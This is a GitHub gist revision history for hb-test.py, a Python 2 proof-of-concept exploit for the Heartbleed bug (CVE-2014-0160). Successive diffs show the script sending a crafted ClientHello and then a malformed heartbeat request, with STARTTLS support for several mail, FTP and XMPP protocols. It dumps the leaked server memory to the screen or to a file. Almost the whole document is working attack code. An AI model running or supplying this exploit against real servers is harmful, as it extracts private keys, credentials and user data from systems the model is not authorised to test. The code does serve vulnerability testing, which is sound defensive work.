Skip to content

Instantly share code, notes, and snippets.

@takeshixx
Last active September 8, 2025 01:16
Show Gist options
  • Select an option

  • Save takeshixx/10107280 to your computer and use it in GitHub Desktop.

Select an option

Save takeshixx/10107280 to your computer and use it in GitHub Desktop.

Revisions

  1. takeshixx revised this gist Jul 14, 2014. 1 changed file with 3 additions and 2 deletions.
    5 changes: 3 additions & 2 deletions hb-test.py
    100644 → 100755
    Original file line number Diff line number Diff line change
    @@ -117,13 +117,14 @@ def rcv_tls_record(s):
    debug('Received message: type = {}, version = {}, length = {}'.format(typ,hex(ver),length,))
    return typ,ver,message
    except Exception as e:
    error(e)
    return None,None,None

    if __name__ == '__main__':
    parse_cl()

    try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5)
    info('Connecting...')
    s.connect((opts.host, opts.port))
    except Exception as e:
    @@ -203,4 +204,4 @@ def rcv_tls_record(s):
    else:
    error('Server processed malformed heartbeat, but did not return any extra data.')
    elif typ is 21:
    error('Received alert')
    error('Received alert')
  2. takeshixx revised this gist Apr 15, 2014. 1 changed file with 5 additions and 5 deletions.
    10 changes: 5 additions & 5 deletions hb-test.py
    Original file line number Diff line number Diff line change
    @@ -134,25 +134,25 @@ def rcv_tls_record(s):
    if opts.starttls == 'smtp':
    re = s.recv(BUFSIZE)
    debug(re)
    s.send('ehlo starttlstest\n')
    s.send('ehlo starttlstest\r\n')
    re = s.recv(BUFSIZE)
    debug(re)
    if not 'STARTTLS' in re:
    debug(re)
    error('STARTTLS not supported')
    s.send('starttls\n')
    s.send('starttls\r\n')
    re = s.recv(BUFSIZE)
    elif opts.starttls == 'pop3':
    s.recv(BUFSIZE)
    s.send('STLS\n')
    s.send('STLS\r\n')
    s.recv(BUFSIZE)
    elif opts.starttls == 'imap':
    s.recv(BUFSIZE)
    s.send('STARTTLS\n')
    s.send('STARTTLS\r\n')
    s.recv(BUFSIZE)
    elif opts.starttls == 'ftp':
    s.recv(BUFSIZE)
    s.send('AUTH TLS\n')
    s.send('AUTH TLS\r\n')
    s.recv(BUFSIZE)
    elif opts.starttls == 'xmpp':
    s.send("<stream:stream xmlns:stream='http://etherx.jabber.org/streams' xmlns='jabber:client' to='%s' version='1.0'\n")
  3. takeshixx revised this gist Apr 14, 2014. 1 changed file with 2 additions and 3 deletions.
    5 changes: 2 additions & 3 deletions hb-test.py
    Original file line number Diff line number Diff line change
    @@ -2,10 +2,10 @@
    """
    Author: takeshix <[email protected]>
    PoC code for CVE-2014-0160. Original PoC by Jared Stafford ([email protected]).
    Thanks to Derek Callaway ([email protected]) for contributing various STARTTLS scenarios.
    Supportes all versions of TLS and has STARTTLS support for SMTP,POP3,IMAP,FTP and XMPP.
    Leaked memory can be dumped directly into an outfile.
    """

    import sys,struct,socket
    from argparse import ArgumentParser

    @@ -102,7 +102,6 @@ def hexdump(s):
    hxdat = ' '.join('%02X' % ord(c) for c in lin)
    pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
    print ' %04x: %-48s %s' % (b, hxdat, pdat)
    print

    def rcv_tls_record(s):
    try:
  4. takeshixx revised this gist Apr 13, 2014. 1 changed file with 2 additions and 2 deletions.
    4 changes: 2 additions & 2 deletions hb-test.py
    Original file line number Diff line number Diff line change
    @@ -2,10 +2,10 @@
    """
    Author: takeshix <[email protected]>
    PoC code for CVE-2014-0160. Original PoC by Jared Stafford ([email protected]).
    Thanks to Derek Callaway ([email protected]) for contributing various STARTTLS scenarios.
    Supportes all versions of TLS and has STARTTLS support for SMTP,POP3,IMAP,FTP and XMPP.
    Leaked memory can be dumped directly into an outfile.
    """

    import sys,struct,socket
    from argparse import ArgumentParser

  5. takeshixx revised this gist Apr 13, 2014. 1 changed file with 193 additions and 138 deletions.
    331 changes: 193 additions & 138 deletions hb-test.py
    Original file line number Diff line number Diff line change
    @@ -1,46 +1,100 @@
    #!/usr/bin/env python2

    # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected])
    # The author disclaims copyright to this source code.

    import sys
    import struct
    import socket
    import time
    import select
    import re
    from optparse import OptionParser

    options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
    options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
    options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS')
    options.add_option('-d', '--debug', action='store_true', default=False, help='Enable debug output')

    def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')

    hello = h2bin('''
    16 03 02 00 dc 01 00 00 d8 03 02 53
    43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
    bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
    00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
    00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
    c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
    c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
    c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
    c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
    00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
    03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
    00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
    00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
    00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
    00 0f 00 01 01
    ''')

    hb = h2bin('''
    18 03 02 00 03
    01 40 00
    ''')
    """
    Author: takeshix <[email protected]>
    PoC code for CVE-2014-0160. Original PoC by Jared Stafford ([email protected]).
    Supportes all versions of TLS and has STARTTLS support for SMTP,POP3,IMAP,FTP and XMPP.
    """

    import sys,struct,socket
    from argparse import ArgumentParser

    tls_versions = {0x01:'TLSv1.0',0x02:'TLSv1.1',0x03:'TLSv1.2'}

    def info(msg):
    print '[+] {}'.format(msg)

    def error(msg):
    print '[-] {}'.format(msg)
    sys.exit(0)

    def debug(msg):
    if opts.debug: print '[*] {}'.format(msg)

    def parse_cl():
    global opts
    parser = ArgumentParser(description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
    parser.add_argument('host', help='IP or hostname of target system')
    parser.add_argument('-p', '--port', metavar='Port', type=int, default=443, help='TCP port to test (default: 443)')
    parser.add_argument('-f', '--file', metavar='File', help='Dump leaked memory into outfile')
    parser.add_argument('-s', '--starttls', metavar='smtp|pop3|imap|ftp|xmpp', default=False, help='Check STARTTLS')
    parser.add_argument('-d', '--debug', action='store_true', default=False, help='Enable debug output')
    opts = parser.parse_args()

    def hex2bin(arr):
    return ''.join('{:02x}'.format(x) for x in arr).decode('hex')

    def build_client_hello(tls_ver):
    client_hello = [
    # TLS header ( 5 bytes)
    0x16, # Content type (0x16 for handshake)
    0x03, tls_ver, # TLS Version
    0x00, 0xdc, # Length
    # Handshake header
    0x01, # Type (0x01 for ClientHello)
    0x00, 0x00, 0xd8, # Length
    0x03, tls_ver, # TLS Version
    # Random (32 byte)
    0x53, 0x43, 0x5b, 0x90, 0x9d, 0x9b, 0x72, 0x0b,
    0xbc, 0x0c, 0xbc, 0x2b, 0x92, 0xa8, 0x48, 0x97,
    0xcf, 0xbd, 0x39, 0x04, 0xcc, 0x16, 0x0a, 0x85,
    0x03, 0x90, 0x9f, 0x77, 0x04, 0x33, 0xd4, 0xde,
    0x00, # Session ID length
    0x00, 0x66, # Cipher suites length
    # Cipher suites (51 suites)
    0xc0, 0x14, 0xc0, 0x0a, 0xc0, 0x22, 0xc0, 0x21,
    0x00, 0x39, 0x00, 0x38, 0x00, 0x88, 0x00, 0x87,
    0xc0, 0x0f, 0xc0, 0x05, 0x00, 0x35, 0x00, 0x84,
    0xc0, 0x12, 0xc0, 0x08, 0xc0, 0x1c, 0xc0, 0x1b,
    0x00, 0x16, 0x00, 0x13, 0xc0, 0x0d, 0xc0, 0x03,
    0x00, 0x0a, 0xc0, 0x13, 0xc0, 0x09, 0xc0, 0x1f,
    0xc0, 0x1e, 0x00, 0x33, 0x00, 0x32, 0x00, 0x9a,
    0x00, 0x99, 0x00, 0x45, 0x00, 0x44, 0xc0, 0x0e,
    0xc0, 0x04, 0x00, 0x2f, 0x00, 0x96, 0x00, 0x41,
    0xc0, 0x11, 0xc0, 0x07, 0xc0, 0x0c, 0xc0, 0x02,
    0x00, 0x05, 0x00, 0x04, 0x00, 0x15, 0x00, 0x12,
    0x00, 0x09, 0x00, 0x14, 0x00, 0x11, 0x00, 0x08,
    0x00, 0x06, 0x00, 0x03, 0x00, 0xff,
    0x01, # Compression methods length
    0x00, # Compression method (0x00 for NULL)
    0x00, 0x49, # Extensions length
    # Extension: ec_point_formats
    0x00, 0x0b, 0x00, 0x04, 0x03, 0x00, 0x01, 0x02,
    # Extension: elliptic_curves
    0x00, 0x0a, 0x00, 0x34, 0x00, 0x32, 0x00, 0x0e,
    0x00, 0x0d, 0x00, 0x19, 0x00, 0x0b, 0x00, 0x0c,
    0x00, 0x18, 0x00, 0x09, 0x00, 0x0a, 0x00, 0x16,
    0x00, 0x17, 0x00, 0x08, 0x00, 0x06, 0x00, 0x07,
    0x00, 0x14, 0x00, 0x15, 0x00, 0x04, 0x00, 0x05,
    0x00, 0x12, 0x00, 0x13, 0x00, 0x01, 0x00, 0x02,
    0x00, 0x03, 0x00, 0x0f, 0x00, 0x10, 0x00, 0x11,
    # Extension: SessionTicket TLS
    0x00, 0x23, 0x00, 0x00,
    # Extension: Heartbeat
    0x00, 0x0f, 0x00, 0x01, 0x01
    ]
    return client_hello

    def build_heartbeat(tls_ver):
    heartbeat = [
    0x18, # Content Type (Heartbeat)
    0x03, tls_ver, # TLS version
    0x00, 0x03, # Length
    # Payload
    0x01, # Type (Request)
    0x40, 0x00 # Payload length
    ]
    return heartbeat

    def hexdump(s):
    for b in xrange(0, len(s), 16):
    @@ -50,103 +104,104 @@ def hexdump(s):
    print ' %04x: %-48s %s' % (b, hxdat, pdat)
    print

    def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
    rtime = endtime - time.time()
    if rtime < 0:
    return None
    r, w, e = select.select([s], [], [], 5)
    if s in r:
    data = s.recv(remain)
    # EOF?
    if not data:
    return None
    rdata += data
    remain -= len(data)
    return rdata


    def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
    print 'Unexpected EOF receiving record header - server closed connection'
    return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
    print 'Unexpected EOF receiving record payload - server closed connection'
    return None, None, None
    print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
    return typ, ver, pay

    def hit_hb(s):
    s.send(hb)
    while True:
    typ, ver, pay = recvmsg(s)
    if typ is None:
    print 'No heartbeat response received, server likely not vulnerable'
    return False

    if typ == 24:
    print 'Received heartbeat response:'
    hexdump(pay)
    if len(pay) > 3:
    print 'WARNING: server returned more data than it should - server is vulnerable!'
    else:
    print 'Server processed malformed heartbeat, but did not return any extra data.'
    return True

    if typ == 21:
    print 'Received alert:'
    hexdump(pay)
    print 'Server returned error, likely not vulnerable'
    return False

    def main():
    opts, args = options.parse_args()
    if len(args) < 1:
    options.print_help()
    return

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print 'Connecting...'
    sys.stdout.flush()
    s.connect((args[0], opts.port))
    def rcv_tls_record(s):
    try:
    tls_header = s.recv(5)
    if not tls_header:
    error('Unexpected EOF (header)')
    typ,ver,length = struct.unpack('>BHH',tls_header)
    message = ''
    while len(message) != length:
    message += s.recv(length-len(message))
    if not message:
    error('Unexpected EOF (message)')
    debug('Received message: type = {}, version = {}, length = {}'.format(typ,hex(ver),length,))
    return typ,ver,message
    except Exception as e:
    error(e)

    if __name__ == '__main__':
    parse_cl()

    try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    info('Connecting...')
    s.connect((opts.host, opts.port))
    except Exception as e:
    error(str(e))

    if opts.starttls:
    re = s.recv(4096)
    if opts.debug: print re
    s.send('ehlo starttlstest\n')
    re = s.recv(1024)
    if opts.debug: print re
    if not 'STARTTLS' in re:
    if opts.debug: print re
    print 'STARTTLS not supported...'
    sys.exit(0)
    s.send('starttls\n')
    re = s.recv(1024)
    BUFSIZE=4096
    if opts.starttls == 'smtp':
    re = s.recv(BUFSIZE)
    debug(re)
    s.send('ehlo starttlstest\n')
    re = s.recv(BUFSIZE)
    debug(re)
    if not 'STARTTLS' in re:
    debug(re)
    error('STARTTLS not supported')
    s.send('starttls\n')
    re = s.recv(BUFSIZE)
    elif opts.starttls == 'pop3':
    s.recv(BUFSIZE)
    s.send('STLS\n')
    s.recv(BUFSIZE)
    elif opts.starttls == 'imap':
    s.recv(BUFSIZE)
    s.send('STARTTLS\n')
    s.recv(BUFSIZE)
    elif opts.starttls == 'ftp':
    s.recv(BUFSIZE)
    s.send('AUTH TLS\n')
    s.recv(BUFSIZE)
    elif opts.starttls == 'xmpp':
    s.send("<stream:stream xmlns:stream='http://etherx.jabber.org/streams' xmlns='jabber:client' to='%s' version='1.0'\n")
    s.recv(BUFSIZE)

    print 'Sending Client Hello...'
    sys.stdout.flush()
    s.send(hello)
    print 'Waiting for Server Hello...'
    sys.stdout.flush()
    while True:
    typ, ver, pay = recvmsg(s)
    if typ == None:
    print 'Server closed connection without sending Server Hello.'
    return
    # Look for server hello done message.
    if typ == 22 and ord(pay[0]) == 0x0E:
    break

    print 'Sending heartbeat request...'
    sys.stdout.flush()
    s.send(hb)
    hit_hb(s)
    supported = False
    for num,tlsver in tls_versions.items():
    info('Sending ClientHello for {}'.format(tlsver))
    s.send(hex2bin(build_client_hello(num)))
    info('Waiting for Server Hello...')
    while True:
    typ,ver,message = rcv_tls_record(s)
    if not typ:
    error('Server closed connection without sending ServerHello for {}'.format(tlsver))
    continue
    if typ is 22 and ord(message[0]) is 0x0E:
    info('Reveiced ServerHello for {}'.format(tlsver))
    supported = num
    break
    if supported: break

    if not supported:
    error('No TLS version is supported')

    info('Sending heartbeat request...')
    s.send(hex2bin(build_heartbeat(supported)))

    if __name__ == '__main__':
    main()
    while True:
    typ,ver,message = rcv_tls_record(s)
    if not typ:
    error('No heartbeat response received, server likely not vulnerable')
    if typ is 24:
    info('Received heartbeat response:')
    if len(message) > 3:
    if opts.file:
    try:
    f = open(opts.file,'w')
    f.write(message)
    f.flush()
    f.close()
    debug('Written leaked memory into {}'.format(opts.file))
    except Exception as e:
    error(str(e))
    else:
    hexdump(message)
    info('Server is vulnerable!')
    sys.exit(0)
    else:
    error('Server processed malformed heartbeat, but did not return any extra data.')
    elif typ is 21:
    error('Received alert')
  6. takeshixx created this gist Apr 8, 2014.
    152 changes: 152 additions & 0 deletions hb-test.py
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,152 @@
    #!/usr/bin/env python2

    # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected])
    # The author disclaims copyright to this source code.

    import sys
    import struct
    import socket
    import time
    import select
    import re
    from optparse import OptionParser

    options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
    options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
    options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS')
    options.add_option('-d', '--debug', action='store_true', default=False, help='Enable debug output')

    def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')

    hello = h2bin('''
    16 03 02 00 dc 01 00 00 d8 03 02 53
    43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
    bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
    00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
    00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
    c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
    c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
    c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
    c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
    00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
    03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
    00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
    00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
    00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
    00 0f 00 01 01
    ''')

    hb = h2bin('''
    18 03 02 00 03
    01 40 00
    ''')

    def hexdump(s):
    for b in xrange(0, len(s), 16):
    lin = [c for c in s[b : b + 16]]
    hxdat = ' '.join('%02X' % ord(c) for c in lin)
    pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
    print ' %04x: %-48s %s' % (b, hxdat, pdat)
    print

    def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
    rtime = endtime - time.time()
    if rtime < 0:
    return None
    r, w, e = select.select([s], [], [], 5)
    if s in r:
    data = s.recv(remain)
    # EOF?
    if not data:
    return None
    rdata += data
    remain -= len(data)
    return rdata


    def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
    print 'Unexpected EOF receiving record header - server closed connection'
    return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
    print 'Unexpected EOF receiving record payload - server closed connection'
    return None, None, None
    print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
    return typ, ver, pay

    def hit_hb(s):
    s.send(hb)
    while True:
    typ, ver, pay = recvmsg(s)
    if typ is None:
    print 'No heartbeat response received, server likely not vulnerable'
    return False

    if typ == 24:
    print 'Received heartbeat response:'
    hexdump(pay)
    if len(pay) > 3:
    print 'WARNING: server returned more data than it should - server is vulnerable!'
    else:
    print 'Server processed malformed heartbeat, but did not return any extra data.'
    return True

    if typ == 21:
    print 'Received alert:'
    hexdump(pay)
    print 'Server returned error, likely not vulnerable'
    return False

    def main():
    opts, args = options.parse_args()
    if len(args) < 1:
    options.print_help()
    return

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print 'Connecting...'
    sys.stdout.flush()
    s.connect((args[0], opts.port))

    if opts.starttls:
    re = s.recv(4096)
    if opts.debug: print re
    s.send('ehlo starttlstest\n')
    re = s.recv(1024)
    if opts.debug: print re
    if not 'STARTTLS' in re:
    if opts.debug: print re
    print 'STARTTLS not supported...'
    sys.exit(0)
    s.send('starttls\n')
    re = s.recv(1024)

    print 'Sending Client Hello...'
    sys.stdout.flush()
    s.send(hello)
    print 'Waiting for Server Hello...'
    sys.stdout.flush()
    while True:
    typ, ver, pay = recvmsg(s)
    if typ == None:
    print 'Server closed connection without sending Server Hello.'
    return
    # Look for server hello done message.
    if typ == 22 and ord(pay[0]) == 0x0E:
    break

    print 'Sending heartbeat request...'
    sys.stdout.flush()
    s.send(hb)
    hit_hb(s)

    if __name__ == '__main__':
    main()